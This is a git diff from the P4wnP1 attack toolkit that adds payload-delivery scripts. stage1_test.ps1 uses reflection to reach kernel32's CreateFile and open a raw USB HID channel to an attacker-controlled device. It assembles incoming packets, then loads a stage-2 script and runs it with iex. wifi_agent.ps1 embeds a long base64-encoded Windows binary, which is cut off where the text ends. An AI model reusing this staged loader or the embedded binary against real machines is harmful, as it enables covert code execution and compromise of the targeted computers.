b/hidtools/payload_delivery/stage1_test.ps1 @@ -0,0 +1,246 @@ + +# This file is part of P4wnP1. +# +# Copyright (c) 2017, Marcus Mengs. +# +# P4wnP1 is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# P4wnP1 is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with P4wnP1. If not, see . + + +# P4wnP1 HID Script +$USB_VID="1D6B" +$USB_PID="0137" + +function ReflectCreateFileMethod() +{ + $Domain = [AppDomain]::CurrentDomain + $DynAssembly = New-Object System.Reflection.AssemblyName("MaMe82DynAssembly") + $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("MaMe82DynModule", $False) + $TypeBuilder = $ModuleBuilder.DefineType("MaMe82", "Public, Class") + # Define the CreateFile Method + $CreateFileMethod = $TypeBuilder.DefineMethod( + "CreateFile", # Method Name + [System.Reflection.MethodAttributes] "Public, Static", # Method Attributes + [IntPtr], # Method Return Type + [Type[]] @( + [String], # lpFileName + [Int32], # dwDesiredAccess + [UInt32], # dwShareMode + [IntPtr], # SecurityAttributes + [UInt32], # dwCreationDisposition + [UInt32], # dwFlagsAndAttributes + [IntPtr] # hTemplateFile +     ) # Method Parameters + ) + + # Import DLL + $CreateFileDllImport = [System.Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) + + # Define Fields + $CreateFileFieldArray = [System.Reflection.FieldInfo[]] @( + [System.Runtime.InteropServices.DllImportAttribute].GetField("EntryPoint"), + [System.Runtime.InteropServices.DllImportAttribute].GetField("PreserveSig"), + [System.Runtime.InteropServices.DllImportAttribute].GetField("SetLastError"), + [System.Runtime.InteropServices.DllImportAttribute].GetField("CallingConvention"), + [System.Runtime.InteropServices.DllImportAttribute].GetField("CharSet") + ) + + # Define Values for the fields + $CreateFileFieldValueArray = [Object[]] @( + "CreateFile", + $True, + $True, + [System.Runtime.InteropServices.CallingConvention]::Winapi, + [System.Runtime.InteropServices.CharSet]::Auto + ) + + # Create a Custom Attribute and add to our Method + $CreateFileCustomAttribute = New-Object System.Reflection.Emit.CustomAttributeBuilder( + $CreateFileDllImport, + @("kernel32.dll"), + $CreateFileFieldArray, + $CreateFileFieldValueArray + ) + $CreateFileMethod.SetCustomAttribute($CreateFileCustomAttribute) + + # Create the Type within our Module + #$MaMe82 = $TypeBuilder.CreateType() + $TypeBuilder.CreateType() +} + +function CreateFileStreamFromDevicePath($MaMe82Class, [String] $path) +{ + # CreateFile method has to be built in [MaMe82]::CreateFile() + # call ReflectCreateFileMethod to achieve this + + # Call CreateFile for given devicepath + # (GENERIC_READ | GENERIC_WRITE) = 0XC0000000 + # FILE_FLAG_OVERLAPPED = 0x40000000; + $handle = $MaMe82Class::CreateFile($path, [System.Int32]0XC0000000, [System.IO.FileAccess]::ReadWrite, [System.IntPtr]::Zero, [System.IO.FileMode]::Open, [System.UInt32]0x40000000, [System.IntPtr]::Zero) + + # Create SafeFileHandle from file + # Note: [Microsoft.Win32.SafeHandles.SafeFileHandle]::new() isn't accessible on PS 2.0 / NET2.0 + # thus we use reflection to construct FileStream + #$shandle = [Microsoft.Win32.SafeHandles.SafeFileHandle]::new($devicefile, [System.Boolean]0) + $a = $handle, [Boolean]0 + $c=[Microsoft.Win32.SafeHandles.SafeFileHandle].GetConstructors()[0] + $shandle = $c.Invoke($a) + + # Create filestream from SafeFileHandle + #$Device = [System.IO.FileStream]::new($shandle, [System.IO.FileAccess]::ReadWrite, [System.UInt32]32, [System.Boolean]1) + # Note: again Reflection has to be used to access the constructor of FileStream + $fa=[System.IO.FileAccess]::ReadWrite + $a=$shandle, $fa, [System.Int32]64, [System.Boolean]1 + $c=[System.IO.FileStream].GetConstructors()[14] + $Device = $c.Invoke($a) + + + return $Device +} + +function send_data($file, $source, $dest, $data, $received) +{ + $report_id = [byte] 0 + $src = [byte] $source + $dst = [byte] $dest + $snd = [byte] $data.Length + $rcv = [byte] $received + + $i=0 + $bytes = New-Object Byte[] (65) + $bytes[$i++] = $report_id + $bytes[$i++] = $src + $bytes[$i++] = $dst + $bytes[$i++] = $snd + $bytes[$i++] = $rcv + + $data.CopyTo($bytes, $i) + + $devfile.Write($bytes, 0, $bytes.Length) + + +} + +function read_data($file) +{ + $r = New-Object Byte[] (65) + $cr = $devfile.Read($r,0,65) + + # async read able to send heartbeats, which isn't needed anymore + #$asyncReadResult = $devfile.BeginRead($r, 0, 65, $null, $null) + #while (-not $asyncReadResult.IsCompleted) + #{ + # # Sending heartbeat data if needed, heartbeat otherwise + # $heartbeat = New-Object Byte[] (0) + # #send_data $devfile 0 0 $heartbeat 0 + #} + #$cr = $devfile.EndRead($asyncReadResult) + + $i=0 + $report_id = $r[$i++] + $src = $r[$i++] + $dst = $r[$i++] + $snd = $r[$i++] + $rcv = $r[$i++] + + + $msg = New-Object Byte[] ($snd) + + [Array]::Copy($r, $i, $msg, 0, $snd) + + + # msg + return $src, $dst, $snd, $rcv, $msg +} + +function GetDevicePath($USB_VID, $USB_PID) +{ + $HIDGuid="{4d1e55b2-f16f-11cf-88cb-001111000030}" + foreach ($wmidev in gwmi Win32_USBControllerDevice |%{[wmi]($_.Dependent)} ) { + #[System.Console]::WriteLine($wmidev.PNPClass) + if ($wmidev.DeviceID -match ("$USB_VID" + '&PID_' + "$USB_PID") -and $wmidev.DeviceID -match ('HID') -and -not $wmidev.Service) { + $devpath = "\\?\" + $wmidev.PNPDeviceID.Replace('\','#') + "#" + $HIDGuid + } + } + $devpath +} + + + +####### +# Init RAW HID device +######### + +# Use Reflection to create [MaMe82]::CreateFile from kernel32.dll +$MaMe82Class = ReflectCreateFileMethod + +$path= GetDevicePath $USB_VID $USB_PID +# create FileStream to device +$devfile = CreateFileStreamFromDevicePath $MaMe82Class $path +$count = -1 +$stage1 = "" + +try +{ + while ($devfile.SafeFileHandle -ne $null) + { + $heartbeat = New-Object Byte[] (0) + send_data $devfile 0 0 $heartbeat 0 + + $packet = read_data $devfile + # set RCV to SND to acknowledge full packet in next send + $src = $packet[0] + $dst = $packet[1] + $snd = $packet[2] + $rcv = $packet[3] + $msg = $packet[4] + + $utf8 = [System.Text.Encoding]::UTF8.GetString($msg) + + + if ($utf8.StartsWith("end_heartbeat") -and ($count -gt 0)) + { + [System.Console]::WriteLine("Received last package of stage1") + + break + } + if ($utf8.StartsWith("begin_heartbeat")) + { + $count = 0 + [System.Console]::WriteLine("Received first package of stage1") + } + elseif ($count -ge 0) + { + # belongs to stream, assemble + $stage1 += $utf8 + $count += 1 + [System.Console]::WriteLine("Received package $count of stage1") + } + + + } + [System.Console]::WriteLine("stage2 reassembled") + #[System.Console]::WriteLine("$stage1") + + #$stage2 = Get-Content stage2.ps1 | Out-String # we load stage 2 from disk + $stage2 = Get-Content stage2_2.ps1 | Out-String # we load stage 2 from disk + "$stage2" + iex $stage2 +} +finally +{ + # end main thread + $devfile.Close() + $devfile.Dispose() +} \ No newline at end of file diff --git a/hidtools/payload_delivery/wifi_agent.ps1 b/hidtools/payload_delivery/wifi_agent.ps1 new file mode 100644 index 0000000..7b1ac95 --- /dev/null +++ b/hidtools/payload_delivery/wifi_agent.ps1 @@ -0,0 +1,4 @@ +$srvID=9 +$s="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